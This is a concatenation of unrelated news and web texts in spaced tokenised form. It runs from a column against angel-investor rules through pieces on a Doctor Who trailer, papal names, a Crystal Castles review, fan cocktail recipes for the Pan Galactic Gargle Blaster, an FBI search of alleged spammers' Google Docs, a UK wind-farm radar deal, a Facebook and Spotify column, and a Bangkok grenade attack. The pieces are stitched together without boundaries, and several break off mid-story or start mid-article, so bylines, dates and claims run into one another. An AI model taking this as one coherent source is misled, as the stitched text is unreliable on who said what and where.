Since the legislation was introduced , its primary sponsor , Sen. Chris Dodd , D - Conn. , said he'd be willing to amend this provision to bring the net worth provision back up to $ 1 million , but that would have to exclude the value of the investors ' home .
While that seems reasonable enough , it would eliminate a huge percent of current angel investors ( and both my friends ) .
Hey , Senator Dodd , why can't someone invest in a start - up even if most of their net worth is tied up in their home rather than in mutual funds ?
2 . The registration process would kill a lot of potentially great new companies .
Small , new companies have to respond fast to changing market conditions .
In the world of technology , four months can be an eternity .
Not only would the registration process take valuable time , it would eat up a lot of a start - up 's limited , valuable finances .
Instead of hiring engineers or marketers , entrepreneurs would have to spend more money on expensive securities attorneys .
3 . A state - by - state free - for - all will make it cumbersome and costly for entrepreneurs to raise funds .
They 'll have to make their way through varying state processes and , if raising money in different states deal with potentially confusing and conflicting regulations .
NONE of this is necessary .
We 've had an explosion of entrepreneurial growth in this country over the last 20 years , financed in large part by angel investors and few problems .
Congress , listen up :
It ai n't broke , so do n't fix it .
Leave the angels and entrepreneurs alone .
Rhonda Abrams is president of The Planning Shop , publisher of books for entrepreneurs .
Her newest book is Hire Your First Employee : the entrepreneur 's guide to finding , choosing , and leading great people .
Register for Rhonda 's free business tips at www.PlanningShop.com.
For an index of her columns , click here .
Twitter : twitter.com/RhondaAbrams .
Copyright Rhonda Abrams 2010 .
Guidelines :
You share in the USA TODAY community , so please keep your comments smart and civil .
Do n't attack other readers personally , and keep your language decent .
Use the " Report Abuse " button to make a difference .
You share in the USA TODAY community , so please keep your comments smart and civil .
Do n't attack other readers personally , and keep your language decent .
Use the " Report Abuse " button to make a difference .
Read more
The BBC has apologised for the trail
Thousands of Doctor
Who fans have contacted the BBC to complain that the ending of Saturday night 's episode was ruined by a trailer for the next show .
The on - screen caption featured an animated cartoon of presenter Graham Norton , host of Over the Rainbow .
It appeared as The Doctor , played by Matt Smith , was making an emotional speech during the story 's cliffhanger ending for The Time of Angels .
The trailer was seen by millions of viewers watching on BBC One in England .
Fans have also been complaining on social networking site Twitter .
One wrote : " Why is the BBC treating its audience like idiots ? "
Another said : " Do n't blink or Graham Norton will catch you . "
The BBC often promotes programmes in this way but the corporation has acknowledged that in this case the scheduling was inappropriate .
A BBC spokesman said : " We apologise for the timing of Saturday night 's trail . "
It is not the first time an unexpected appearance by Norton has angered Doctor Who fans .
When the series returned in 2005 after a 16 - year break , a technical error caused Norton 's voice to be briefly heard over the episode 's opening scenes .
John Paul I , previously known as Albino Luciano and the first Pope to use a double name , chose it in honour of his two immediate predecessors , John XXIII and Paul VI .
So will there be a John Paul III ?
Possibly .
When cardinals , the " princes of the church " who rank higher than any other ecclesiastic but the Pope , agree on a successor in their conclave later this month , he will be asked if he accepts , and how he wishes to be known .
He can choose a Latinised form of his Christian name , a saint 's name or the name of an earlier Pope .
He may also want to pick a name that would attribute a virtue to him , such as Pius ( pious ) , Innocent or Clement ( merciful ) .
Some allow personal considerations to guide them , such as Pope John XXII , who chose his name to honour the memory of his father .
However , Peter is a name seen as out of bounds out of respect to the first ever Pope , Saint Peter , who was a disciple of Jesus .
In 1009 , a cardinal named Peter switched to Sergius IV , as he felt that to become Peter II was presumptuous .
The given names most often chosen have been John ( 23 times ) , Gregory ( 16 ) , Clement ( 14 ) , Innocent ( 13 ) , Leo ( 13 ) and Pius ( 12 ) .
Up to the end of the first millennium , popes generally kept their Christian name .
The first to buck tradition was John II in 533 .
Born Mercury , he decided he could not reasonably head the church with the name of a pagan Roman god .
The first papal name to be repeated was Sixtus .
The first Sixtus took the pontificate in the second century and there have been four others .
As with kings and emperors , a Roman numeral is added if the Pope has had a namesake as predecessor -- John Paul I was unusual in not waiting for history to decide if anyone else wanted to be known by the same name .
Vatican experts on Catholic websites say that while the next Pope may want to show willingness to continue in the same vein as his predecessor by being called John Paul III .
On the other hand , the late Pope 's lengthy stint in office , 26 years , may prove an incentive to embark on a new path .
The experts suggest that , given an increasing emphasis on the teachings of the gospels , another disciple 's name might be appropriate .
Becoming John XXIV may indicate a desire for further reforming the church .
Choosing Paul VII might show a desire to pursue a strong moral stance .
Becoming Pius XIII may suggest a return to tradition , and perhaps even the unwinding of some of the radical changes over the past decades .
A Gregory might want to restore many of the church 's lost treasures such as its beautiful liturgy and music .
AFP
After all of the awful shit Crystal Castles did in the wake of their success , a whole lot of people hoped their new album would be terrible .
Sorry , haters : 2010 's Crystal Castles improves on their ( also self - titled ) debut in nearly every way .
The latest from the Toronto - based electro duo is reminiscent of the jump forward taken by Deerhunter between Cryptograms and Microcastle , or Fuck Buttons from Street Horrrsing to Tarot Sport .
Like those acts , Crystal Castles have reconciled with their detractors instead of running from them .
By staying true to themselves , they 've created a more focused , propulsive , and satisfying follow - up .
Some listeners might miss the sonic shock that came from hearing the sub-zero Italo chill of " Magic Spells " sequenced next to the 8 - bit electrocution of " Xxzxcuzx Me " , but clashes like those wore out their welcome over the span of 16 tracks .
Here , Crystal Castles embrace continuity and broaden their dynamic range beyond the primitive loops that once constituted the foundations of their songs .
The core elements of first single " Celestica " , for example , are pure shoegaze , but the waves of distortion that scrape across its chorus squash any concerns that the duo has gone soft .
For a band known for its harsh midrange , this record reveals a surprising amount of depth in headphones .
Crystal Castles are far more pop than before , too , which was probably an inevitable move , but hardly a bad one .
Like " Celestica " , " Suffocation " and " Empathy " mix fanged distortion and sparkly synths , while tracks like " Vietnam " , " Not in Love " , " Intimate " , and the rave - tinged " Baptism " arm the record with loads of could - be singles .
But despite this shift toward beauty and clarity , Crystal Castles still rip into some punishing , epileptic moments , like the distorted bass riff on " Birds " and the shredded brutality of " Doe Deer " .
The fluidity of the music is matched by Alice Glass ' frequently manipulated vocals , a showcase for someone too often pigeonholed as a bratty screamer .
She sounds at times like everything from a Leslie guitar ( " Empathy " ) to a * Cloverfield - * style monster ( " I Am Made of Chalk " ) .
The obvious comparison is the Knife 's Silent Shout , but where Karin Dreijer - Andersson often manipulates her voice to play characters , Glass is just as disturbing for her dehumanization .
As rewarding as this new album is , it 's even more impressive when you consider its context : Crystal Castles may have come on at the tail - end of the blog - house / nu - rave / French - touch mini-rage , but they 've now transcended it , moving from scene linchpin to indie stars .
The reason is simple : Crystal Castles are a singular act who rarely sound like anyone other than themselves .
So just as Ladytron 's The Witching Hour did for electroclash in 2005 , Crystal Castles seems destined to close the door on a fleeting , once - fashionable genre in the best way possible : by making an artistic leap beyond its boundaries .
Pan Galactic Gargle Blaster
Flavour " Like having your brains smashed out by a slice of lemon wrapped around a large gold brick . "
Units 10000 Standard drinks 7916
Artistic depiction of the effect of the Pan Galactic Gargle Blaster
The Pan Galactic Gargle Blaster was invented by Zaphod Beeblebrox , a major character in Douglas Adams ' novel The Hitchhiker 's Guide to the Galaxy .
The effect of a Pan Galactic Gargle Blaster is described as " like having your brains smashed out by a slice of lemon , wrapped ' round a large gold brick . "
It has also been described in the novel as " the alcoholic equivalent to a mugging ; expensive and bad for the head . "
Its original , fictional recipe , is as follows :
Recipe [ edit ]
Take the juice from one bottle of that Ol ' Janx Spirit .
Pour into it one measure of water from the seas of Santraginus V( Oh , that Santragian seawater !
Oh , those Santragian fish ! )
Allow three cubes of Arcturan Mega - gin to melt into the mixture ( it must be properly iced or the benzine is lost ) .
Allow four litres of Fallian marsh gas to bubble through it , in memory of all those happy Hikers who have died of pleasure in the Marshes of Fallia .
Over the back of a silver spoon float a measure of Qualactin Hypermint extract , redolent of all the heavy odours of the dark Qualactin Zones , subtle , sweet , and mystic .
Drop in the tooth of an Algolian Suntiger .
Watch it dissolve , spreading the fires of the Algolian Suns deep into the heart of the drink .
Sprinkle Zamphuor .
Add an olive .
Drink . . . but . . . very carefully . . .
Mars recipes [ edit ]
Recipe number four [ edit ]
Another recipe :
1 1/2 shots 151 Proof Rum
1/4 shot Tequila
1/4 shot Gin
2/3 shot Triple Sec
1 shot Blue Curaçao
1 dash Bitters
1 dash Grenadine
Recipe number five [ edit ]
4 parts Bacardi Citron
1 part Bacardi 151 ( for color )
1 part Goldschlager
1 part Everclear ( to cut Goldschlager )
Recipe number six [ edit ]
Another recipe :
1 part Everclear ( or any other strong grain alcohol such as Bourbon , Moonshine , or Vodka )
1 part Bitter Lemon ( or plain Tonic Water )
1 part Bombay Sapphire Gin ( or other gin )
1 part Yukon Jack Perma - Frost Schnapps ( or other mint schnapps , or white crème de menthe )
Enough blue food coloring to make the mixture a very light sky blue
Also needed :
Sugar cubes
Cinnamon extract
Yellow food coloring ( optional )
Angostura Bitters
Olives
Mix the first five ingredients and chill ( usually for 24 hours ) .
Then , take a sugar cube and let it absorb 1 milliliter of cinnamon extract and 1 drop of yellow food coloring ( optional ) .
Place three ice cubes in a glass and pour the chilled liquid mixture over these .
Drop in the sugar cube and stir to dissolve , or just let it sit ( if food coloring is used , often the sugar cube is just left to sit , to create a layering effect with the color ) .
Sprinkle the Angostura Bitters in the drink , and add an olive .
Drink , but very carefully .
Alternatively , one can let the sugar cube absorb 1 milliliter of Angostura Bitters , and sprinkle ground cinnamon on the top of the drink , thus omitting the cinnamon extract .
It is often more convenient to make a large amount of the mixture ahead of time and chill for a day , rather than to constantly mix more of it .
It 's also best to save it for a special occasion , such as Towel Day , due to the work put into making the drink .
Recipe number 7 [ edit ]
2 measure of white orujo
1 measure of gin
3 measures of tonic water
Angostura drops
Lemon drops
Add an olive
Recipe number 8 [ edit ]
1 dash absolut citron
1 dash goldschlager
2 dashes everclear
1 dash lemonchello
Find an old Champagne glass like the kind Bogey uses in Casablanca
Fill the rest of glass with extra dry or brut champagne :
Andre if , you 're ... well , a " hitchiker " , Vueve Clique if you 're not .
Recipe from " Spiders " Nightclub in Hull , UK [ edit ]
Invented in 1981 By George Mercer and Mark Borril , formerly known as a firebird special , and is a combination of a harvey wallbanger and a tarantula !
named so because anybody who drank one passed out ,
25 ml Vodka
25 ml Pernod
25 ml Galliano
25 ml Blackcurrant
25 ml Orange juice
Enough cider to top up
Pour over some ice , stir and enjoy !
Recipe from " The Firm " Nightclub from the Old Melbourne Hotel in Perth , Western Australia , c1990 [ edit ]
Equal parts rum , vodka , tequila , plus cream and grenadine
From The Firm Facebook group .
Recipe reverse - engineered from a stain on RJ Lanning 's towel [ edit ]
1 oz vodka ( that Ol ' Janx Spirit )
1 oz Clamato ( oh , those Santraginus fish )
1 oz ice cold gin ( Arcturan Mega - gin )
4 oz Zipang Sparkling Sake ( Fallian marsh gas )
1 oz Creme de Menthe ( Qalactin Hypermint extract )
1 Jalapeno ( tooth of an Algolian Suntiger )
Sprinkle with lemon zest ( Zamphuor )
add an olive
WARNING : Drinking Pan Galactic Gargle Blasters may cause serious damage to the rods and cones in the human eye , thus explaining why consumers of this beverage have often reported it to be green in color when , in fact , it is not .
Official Fried Farmers Recipe [ edit ]
Flavour " Like having your brains smashed out by a slice of lemon wrapped around a large gold brick . "
In a carafe
20 oz .
Jack Daniels
20 oz .
Captain Morgan's Spiced Rum
20 oz .
Southern Comfort
20 oz .
Jose Cuervo Gold
20 oz .
Triple Sec
20 oz .
Lime Cordial
40 oz .
Fresh Orange Juice
40 oz .
Sprite
Add 2 bags of ice and stir well .
Remember ...
Flavour " Like having your brains smashed out by a slice of lemon wrapped around a large gold brick . "
Recipe For The Ones With Seriously Damaged Rods And Cones [ edit ]
1 oz .
Jack Daniels
1/2 oz .
Peach Schnapps
1/2 oz .
Blue Curaçao
1 - 2 Drops Of Lemon Extract A Bit More If You Use Juice
Orange Juice
Fill the glass 3 / 4 full of ice , add the booze , top it off with OJ , mix well .
Recipe # 13 from a Pan - Asian restaurant - at - the - end - of - a- collegiate - Black - Hole - Universe [ edit ]
Martini glass , chilled
3.0 Sugar cubes , dowsed w/ Chartreuse and Creme - de - Menthe
Set aside for later ...
DO NOT MUDDLE !!!
Fill a cocktail shaker w/ ice , then ...
2.0 Citron vodka
Dash Limoncello
Dash Sweet & Sour mix ( or use freshly muddled sugar and lemon )
SHAKE .
Strain — loosely , w/ Boston shaker
ADD the seasoned Sugar Cubes ( see above )
TOP w/ Sprite + Tonic
2.0 Basil Seed Drink ( available at most Asian markets )
Dash Blue Curaçao ( sinks )
Dash Absinthe ( floats )
Dash Nutmeg - or - Five - spice
GARNISH w/ olive [ Do not omit ! ]
Recipe number forty - two [ edit ]
Into a 12 oz glass
drop two - three large ice cubes
sprinkle a pinch or two of cayenne pepper
1/4 tsp powdered vanilla
1/8 tsp lemon extract
Add
1/2 shot 151 Proof Cruzan Rum ( Bacardi will not turn out well )
1/2 shot 80 Proof Gold Rum
3/4 shot Tequila
1 shot Sapphire Gin
1 shot green Creme de Menthe
TOP w/ Sprite ( or fizzy lemonade )
Stir exactly twice from top to bottom !
Add an olive
For a nice touch add 8 1/2 " frozen gin cubes ( 4:1 water : gin )
The Mallet Assembly 's Recipe [ edit ]
Fill a 28 - oz.
hurricane glass with crushed ice .
Add the following in order :
1 oz .
Everclear ® ( The ice should sizzle . )
( ) 1 oz .
Bacardi ® 151
151 1 oz . apricot - flavored brandy
1 oz . triple sec
1 oz . lemon juice
1 oz . orange juice
1 oz . pineapple juice
1 oz .
Tom Collins mix
Stir , then top off the glass with ice .
Drink .
Slowly .
This recipe is a modified version of the Pat O'Brien 's® " Skylab [ Fallout ] " .
Some have suggested replacing the apricot - flavored brandy with peach - flavored brandy and cutting back on the citrus while increasing the amount of Collins mix ; purists argue that the resulting drink is a bit too sweet .
This recipe is not strictly analogous to Douglas Adams ' recipe , but the effect is the same , and the equimolar quantities of ingredients make it easily scalable ( until you 've had one , at least ) .
As an added bonus , the dregs may be used to restore the shine to old pennies .
The BarBot Recipe [ edit ]
Prepare one part of each :
Vodka
Rum
Whiskey ( preferably cheap and harsh )
Gin
Orange juice
Lime juice , diluted to taste
Cola
Ginger beer
Have a robot dispense each measure into an iced tumbler from a considerable distance .
Thank your robot , and prepare for the rest of your night to become a blur .
The Housewarming Recipe [ edit ]
This is a slightly sweet drink , but hey , I like sweet .
And this recipe gives an unparalleled visual experience .
Use a 16 oz clear glass .
Add the following :
1 oz .
Grape Juice
2 oz .
Pineapple Juice
1 oz .
Citron Vodka
1 oz .
Hot Cinnamon Schnapps
Then add a glowing ice cube .
You can find glowing LED ice cubes online .
The best are the ones that change color .
Then :
2 oz Sprite ®
4 oz Club Soda
That is , fill up the rest of the glass with Sprite® and Club Soda in a 1:2 ratio , but leave an inch or so of room at the top of the glass .
It 's best if the Sprite® and Club Soda are room temperature , not cold .
Then add a piece of dry ice .
For a minute or so you 'll have the full Pan Galactic Gargle Blaster experience : a glowing , bubbling drink overflowing with mist ( Fallian marsh gas ) .
Once the dry ice has bubbled away , enjoy .
Best served at night , or in a dark environment .
The Mister Break Recipe [ edit ]
Stir the following , straight without water or ice :
1/2 oz Single Barrel Jack Daniel 's Tennessee Whiskey ;
1/2 oz Fernet Branca ;
1/2 oz Wormwood Bitters
1/8 teaspoon Everclear Vodka
1/8 teaspoon Angostura Bitters
1/8 teaspoon Fee Brother 's Lemon Bitters
A slice of jalapeno
The Stage Show Recipe [ edit ]
Sugar Cube soaked in Angostura Bitters in the bottom of a tall cylindrical container ( In the theatre they used 100 ml measuring tubes )
5 ml Blue Curacao
10 ml Vodka
Top up with " Champagne "
The 42nd birthday party recipe [ edit ]
Mix the following :
1/2 oz. rum ( Bacardi )
1/2 oz . whiskey ( Maker 's Mark )
1/4 oz .
Orange Curacao
1/4 oz .
Triple Sec
1/2 oz .
Sprite or other clear carbonated beverage
Drop in , without stirring :
1 oz .
Pineapple coconut juice
1/8 oz .
Grenadine
dash of bitters
dash of cayenne
one olive
Finally , drop in a chunk of dry ice .
Availability [ edit ]
A Pan Galactic Gargle Blaster may be had at :
The Pub at the End of the Universe , Portland , OR - no longer open
.
The Land of Dreams , Halifax , Nova Scotia ( but only if you get the right bartender ... Kris )
Cocos Island Grill and Cocktail Bar , Hermanus , Western Cape , South Africa
Beef ' o ' Brady 's in Frankfort , KY , USA
The Hunter Club in Bury St Edmunds , Suffolk , UK
42 Lounge in Milwaukee , Wisconsin - no longer open
Cocktail Bar Tijuana in Belgrade , Serbia
Zaphod Beeblebrox bar in Ottawa , ON ( Canada ) , ( sadly , no longer open )
42 bar in Athens , Greece
Spiders gothic nightclub in Hull , UK ( recipe mentioned above )
Black Spot Cafe Bar in Hyannis , Ma , USA
Coppers Corner in Laramie , WY
A Night Kitchen in Seattle , WA , USA - no longer in business
AFK Tavern in Everett , WA , USA
Silly 's With a Twist , ME , USA
Crabby's Bar , Pendleton , OR , USA
JD's Sports Bar in Grants Pass , OR , USA
Bar at the end of the universe ( Бар на края на Вселената ) , Sofia , Bulgaria ( 1 in the centre , 1 close to the MetOffice )
BarBot 2012 , from the Santa BarBot table , San Francisco CA ( USA )
Grumpy Dave 's Pub in Bowling Green , OH USA
Baja Bean , The Corner , Charlottesville , VA USA - no longer in business
Dernier bar avant la fin du monde , 19 avenue Victoria , Paris ( Fr )
Robin Hood Bar in Beyoğlu , İstanbul , Turkey
Eddie 's Bar & Grill in Dunedin , FL ( Tyler 's version )
Storm Crow Tavern , Vancouver , BC , Canada
Other bars may be able to mix any of the recipes above ( or one of their own ) .
Pan Galactic Gargle Blasters were also served at a couple of the stage show adaptations of The Hitchhiker 's Guide to the Galaxy in the late 1970s , according to Neil Gaiman in his book Do n't Panic : The Official Hitchhikers Guide to the Galaxy Companion .
In Russia a Pan Galactic Gargle Blaster may be had at the Coffee&Books art - cafe in St. Petersburg .
Brdr. Price Rosenborggade , Copenhagen , Denmark - A very good one .
Bomb Bar , Manhattan , KS , USA
Cheeky Monkey Bars across Pretoria , South Africa
Silverbirch Cafe at Lifestyle Johannesburg , South Africa
Notes [ edit ]
Affäre um einen Ex-Mitarbeiter Räume der Deutschen Bahn durchsucht
Ärger für die Deutsche Bahn : Die Staatsanwaltschaft Kiel hat die Räume des DB - Pressebüros in Hamburg durchsuchen lassen .
Hintergrund ist die frühere Zusammenarbeit des Unternehmens mit einem NDR - Journalisten .
Er soll Firmen gegen Geld Sendezeiten im Fernsehen verschafft haben .
FBI agents targeting alleged criminal spammers last year obtained a trove of incriminating documents from a suspect 's Google Docs account , in what appears to be the first publicly acknowledged search warrant benefiting from a suspect 's reliance on cloud computing .
The warrant , issued August 21 in the Western District of New York , targeted Levi Beers and Chris de Diego , the alleged operators of a firm called Pulse Marketing , which was suspected of launching a deceptive e-mail campaign touting a diet supplement called Acai Pure .
The warrant demanded the e-mail and " all Google Apps content " belonging to the men , according to a summary in court records .
Google provided the files 10 days later .
From Beers ' account , the FBI got a spreadsheet titled " Pulse_weekly_Report Q - 3 2008 " that showed the firm spammed 3,082,097 e-mail addresses in a single five - hour spree .
Another spreadsheet , " Yahoo_Hotmail_Gmail - IDs , " listed 8,000 Yahoo webmail accounts the men allegedly created to push out their spam .
The Yahoo accounts were established using false information , allegedly in violation of the CAN SPAM Act .
Privacy advocates have long warned that law enforcement agencies can access sensitive files stored on services like Google Docs with greater ease than files stored on a target 's hard drive .
In particular , the 1986 Stored Communications
Act allows the government to access a customer 's data whenever there are " reasonable grounds " to believe the information would be relevant in a criminal investigation – a much lower legal standard than the " probable cause " required for a search warrant .
But in the spam investigation , FBI and federal prosecutors opted for a full - blown search warrant , making it palatable – more or less – even to government watchdogs .
" Assuming the warrant is valid and satisfied the Fourth Amendment … the government 's conduct in this case certainly satisfied one of our biggest concerns , " says EFF staff attorney Kevin Bankston .
" We think a warrant should be required to access cloud data . "
The cloud , though , undoubtedly makes things easier for the feds .
If the alleged spammers had kept their files strictly on their local hard drives , the FBI would have had no choice but to serve the warrants in person , seize the computers or image their contents , and leave the suspects with a copy of the search warrant and a written inventory of everything taken .
The Google Docs search warrant , in contrast , was issued under seal and presented politely to Google , without an FBI agent having to draw his gun or sternly bang on a door .
More significantly , and unlike most physical search warrants , the government has no obligation to disclose the cloud search to Beers and de Diego , unless criminal charges are filed .
Beers said he 's received no notice that his documents were searched , even though nearly eight months have passed since Google handed them over .
" I have not received notification from Google or the government about this search warrant , " he writes .
" Notice can be a little tricky if it's not a physical place , " says Orin Kerr , a professor at the George Washington University Law School .
" You can imagine a law that requires the government to send an e-mail to the account , ' Your receipt for what we recovered . ' "
For its part , Google says it has a policy of providing notice whenever it can .
" Currently , if it does n't jeopardize the investigation … and is allowed under the law , we work to notify the user before turning over any information requested , " says spokesman Brian Richardson .
" That will allow the user to contest the demand in court . "
The New York search warrant was issued under seal , but was detailed in a public follow - up search warrant affidavit ( . pdf ) filed in Denver this year , which successfully sought access to the contents of dozens of Yahoo webmail accounts used in the spam operation .
The same Colorado prosecutors ' office made news this week for attempting , and failing , to gain access to some Yahoo e-mail content without a search warrant , in a separate case that 's mostly under seal .
It 's unclear if the cases are related .
Jeffrey Dorschner , spokesman for the U.S. Attorney 's Office in Denver , declined comment .
De Diego 's attorney and sister Sarah de Diego says the e-mail messages detailed in the search warrant affidavit were all opt-in , and no crime was committed – the Yahoo webmail addresses were registered only to test a piece of mailing software .
Chris de Diego has been cooperating with the FBI in the case since last November , says the lawyer .
" He was just a pencil - pusher , " she told Threat Level on Monday .
" It 's been a long and expensive ongoing investigation , into , as near as I can tell , absolutely nothing . "
Updated to add comments by De Diego 's attorney and Beers .
David Kravets and Ryan Singel contributed to this report .
Photo : Tom Raven / Flickr
See Also :
A pioneering deal under which the wind farm industry will spend at least £ 16 m on advanced radar defence systems has cleared the way for a significant boost in the UK 's supply of renewable energy .
Wind energy projects across Britain have been held up for years because of planning disagreements , some concerned with interference from turbines that can baffle air - traffic control and defence systems , creating blind spots in coverage known as ' blackout zones ' .
The fear is that hijacked airliners or incoming hostile bombers could evade detection .
The agreement involves a consortium of wind power firms purchasing US - manufactured Lockheed Martin radar equipment so that Britain 's sensitive eastern airspace approaches can be protected after new turbines are erected around The Wash .
The radar will be based onshore in Norfolk .
As its part of the agreement , the Ministry of Defence has lifted planning to objections to five new , offshore wind farms that will contain almost a thousand wind turbines .
The deal is expected to trigger a fresh wave of wind farm applications .
The wind - driven turbine blades can rotate at up to 200 mph , mimicking on - screen the appearance of slow - moving aircraft and showing up as a blur of images .
Simply discounting the clutter is dangerous because the images obscure patches from which planes could suddenly emerge ; there are fears that hijacked airliners or bombers could evade detection .
The RAF and the renewable energy industry have been negotiating for years over the problem .
A number of technical fixes are being explored , including applying radar - absorbing material to turbine blades to render them invisible to radar .
The defence contractor Raytheon has been commissioned by the UK's National Air Traffic Services ( NATS ) to develop improved radar systems that can discriminate between aircraft and wind turbines .
The new spirit of co-operation between the MoD and windfarm developers follows adoption of the government 's aviation plan in 2008 .
Release of military research reports has helped generate some common understanding .
" There now seems to be quite a degree of momentum , " said Nicola Vaughan , head of aviation at RenewableUK , the industry body that represents wind , wave and tidal power firms .
" The MoD have started to lift their objections , particularly to offshore turbines , [ following ] this solution …
There 's around 1,000 new turbines – 3.2 gigawatts of power [ on the Wash ] – which now stand a chance of being built , because the MoD objection was the last significant [ hurdle ] . "
The Lockheed Martin Air Defence Radar TPS 77 system , which cost about £ 20 m , will be paid for by the windfarm developers , the Crown Estate on whose submerged land the turbines will be built , and the Department of Energy and Climate Change , which is contributing £ 4 m .
The Crown and the developers , which include Scira Offshore Energy , Centrica , NPower and Warwick Energy , have paid the rest .
The Sheringham Shoal offshore windfarm , with 88 wind turbines and already under construction , will be the first to be completed .
There are applications for about 3,000 further turbines , equivalent to 6GW , now going through the planning process , according to RenewableUK .
Proposals for an additional 3,000 turbines are at earlier stages of development .
The MoD said it needed to ensure aircraft safety , adding : " By installing an additional radar in Norfolk we will significantly reduce the negative impact of the turbines on MoD business . "
• This article was amended on 4 May 2010 .
Due to an editing change , the original said that the new radar system would be sited in the offshore windfarms , which would double as radar defence systems .
This has been corrected .
Sadly , there is no cure for megalomania .
But venture capitalists ought to start funding the search for a cure , because it ’s costing many of them a lot of money , and is likely to cost even more in the future .
Here ’s how it works .
A smart entrepreneur — a Harvard dropout , say , or some guy who made a lot of money by selling off his last venture to some clueless multinational — starts up a web business which grows like crazy by attracting millions of subscribers who use its services for free .
Pretty soon , it ’s got 400 - million of them and everyone is saying : “ Wow ! 400 - million users !
That must be good for something . ”
Then several things happen .
Firstly , the proprietor of the sensation du jour starts drinking the Kool - Aid and contracts the aforementioned megalomania .
He begins to fantasise that he could own the whole internet .
Secondly , thousands of other entrepreneurs think “ Wow !
He could own the whole internet .
We need to make sure our stuff has hooks into his stuff .
Otherwise , we ’re toast . ”
And then the mainstream media , whose insights into this could be written in 96 - point Helvetica bold on the back of a postage stamp , are going around saying , “ Jeez , this stuff is the real deal .
How do we get onside ? ”
The Facebook phenomenon provides a perfect illustration of this process .
At the moment , it looks like an all - conquering monster , and is being reported accordingly .
According to conventional wisdom , if the last decade was dominated by Google , this coming decade will belong to Facebook .
And the company is beginning to behave as though it believed this .
The ‘ Like ’ button
On April 21 , Facebook ’s CEO , Mark Zuckerberg , announced some moves aimed at consolidating Facebook ’s supposed grip on the web .
From now on , for example , visitors to an increasing number of high - profile websites will find a “ Like ” button on the page .
Click on it and the news that you approve of the site ’s content will automatically be integrated into your Facebook profile , for the delectation of your friends .
( Interestingly , there ’s no “ dislike ” button , which tells you all you need to know about the motivation behind this technology ) .
This move caused jaws to drop all over the blogosphere .
“ I think Facebook just seized control of the internet , ” wrote one excited commentator .
And Slate ’s technology writer , as he listened to Zuckerberg ’s presentation , tweeted that “ Facebook is going to be everywhere .
Facebook is basically going to be the web . ”
Meanwhile , over at Spotify , the wildly successful music streaming service , they ’ve also been making big changes .
On 27 April they announced a major upgrade to their service .
Among the new features is — yes , you guessed it — Facebook “ connectivity ” .
All your friends who are using Spotify will appear on your screen , and you can drag and drop playlists to them .
So now all your Facebook buddies will know you ’re partial to Status Quo , the soppier end of Norah Jones or Classic FM compilation albums .
Or worse .
Megalomania rules OK
But that ’s just the cosying - up - to - Facebook end of it .
Spotify ’s announcement also suggested that they , too , have been drinking the Kool - Aid .
From now on , Spotify users will have a “ library ” .
This is a virtual container that holds any song in a Spotify playlist that you ’ve saved , any MP3 files on your hard drive and any songs or albums that you ’ve “ starred ” as favourites .
Henceforth , Spotify can search any folder on your computer for audio content and play it just like a stream from the web , or like iTunes does with your offline library of songs .
What that means , in the words of one commentator “ is that you can now use Spotify to entirely replace iTunes , Windows Media Player , Winamp or any other music playback software on your computer .
It can even sync local files wirelessly to an iPhone , if you ’re a Spotify Premium subscriber , and support for Android handsets is promised soon ” .
Translation : Spotify will be the Only Thing You ’ll Ever Need — the solution to all your problems .
Megalomania rules OK .
What ’s comical about this stuff is not so much its implicit arrogance — the assumption that we all want to share using Facebook — as its historical naivety .
The history of the web is littered with the whitened bones of enterprises that once dreamed of total control .
So until the cure for megalomania is invented , the only known antidote is a mantra .
Repeat after me : the net is bigger than any single enterprise .
And nobody owns it .
– guardian.co.uk
This is my poster for Galway Kayak Club who as you can see are now taking bookings for their beginners courses !
Signing up to the course and passing the exam gets you an ICU level 2 Certificate plus membership for the rest of the year .
There ’s no better way to start kayaking !
The Hubble space telescope has discovered a planet in our galaxy in the process of being devoured by the star that it orbits , according to a paper published in The Astrophysical Journal Letters .
The doomed planet , dubbed WASP - 12 b , has the highest known surface temperature of any planet in the Milky Way - around 1500 degrees Celsius .
A NASA artist 's image of how the doomed planet is being eaten by its parent star .
But it could be enveloped by its own parent star over the next ten million years , the paper 's authors have concluded .
Using a new instrument called the Cosmic Origins Spectrograph that was installed on Hubble in 2009 , the researchers observed how the planet was whipped into an elongated shape by gravitational forces .
Why is n't Obama talking about climate change ?
I 've been thinking a lot about David Roberts 's argument that the administration 's response to the Deepwater oil spill shows it 's not committed to pushing energy legislation this year .
" If he was looking for an opportunity to drive home the clean energy message , this was it , " Roberts writes .
" The Katrina of fossil fuels .
Yet all he 's done is blandly reaffirm his support for offshore drilling .
I have n't heard a word about clean energy alternatives or , God forbid , efficiency , which if pursued seriously could save more oil than offshore rigs could produce , at a net savings rather than a cost , and with the added bonus feature of not occasionally leaking out and destroying entire American ecosystems and industries . "
You can see this two ways .
The first is that the Deepwater spill is best understood as a national tragedy , and until the crisis phase is over , it would be both political suicide and simply indecent to subsume it into a larger argument about clean energy , oil dependence and climate change .
On the other hand , a five - degree centigrade rise in global temperatures will be an unbelievable global catastrophe .
It will dwarf the devastation caused by the spill .
And the responsible thing for Obama to do is to explain that : Dependence on fossil fuels ensures oil spills , and it also ensure a warming climate , and we need to understand the Deepwater spill as not just a tragedy , but a predictable outcome , and a harbinger of much worse .
That is not politicizing a tragedy .
That is being honest about what caused it , and what it means .
That said , this does n't need to happen on Day 3 .
The larger argument about the need to wean ourselves off of oil can be made in a week .
Allowing time for grieving and emergency response does not mean a call to action can't follow .
But if one does n't follow , then Roberts is right , and it's a sign that the White House does n't want a discussion over oil dependence this year .
Nina Biehal , 57 , from Leeds , said she queued for nearly three hours in Calais on Saturday '' along with about a thousand other people trying to get back to Britain ' ' after she was unable to fly home from her Easter holiday in the south of France .
Category : Wildlife .
Stripes by karenoliver , who says : " When I saw a number of zebras clustered together I knew I had to photograph the legs .
I liked the deception , the patterns , the abstact feel it gave me .
I also wanted to get a different shot of the zebra .
I framed the shot to include just one tail to give the impression of one zebra with many legs "
We do n't know if this guy got his box running GLaDOS , but it sure as hell looks like standard issue Aperture Science , if you ask us .
We 'd like to see it running Portal though -- only that would be recursive enough for our tastes .
[ Thanks , Nick ]
BANGKOK — Five grenades exploded in the heart of Bangkok ’s business district on Thursday evening , killing at least one person and wounding 75 as rival groups of protesters demonstrated and shouted insults at one another across a makeshift barricade .
The explosions , several of which took place on the platform of an elevated train , scattered shrapnel through crowds that included foreign tourists , sending people fleeing in panic into shops and restaurants .
The attacks threatened to ignite wider violence after more than six weeks of protests that seek to bring down the government and force a new election .
Deputy Prime Minister Suthep Thaugsuban , speaking on television , blamed the antigovernment protesters known as the red shirts , who have paralyzed parts of Bangkok .
